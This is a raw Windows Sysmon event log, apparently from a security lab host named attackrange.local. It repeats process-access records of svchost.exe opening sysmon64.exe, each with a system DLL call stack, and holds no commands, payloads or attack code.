09:20:17.236{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053213Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.236{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053212Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.236{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053211Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.236{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053210Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.236{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053209Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.236{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053208Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.236{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053207Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.236{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053206Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.236{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053205Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.094{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053204Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.094{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053203Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.094{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053202Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.094{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053201Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.094{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053200Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.094{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053199Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.094{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053198Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.094{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053197Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.094{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053196Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.094{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053195Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.094{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053194Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.094{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053193Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.094{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053192Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.094{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053191Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.094{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053190Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 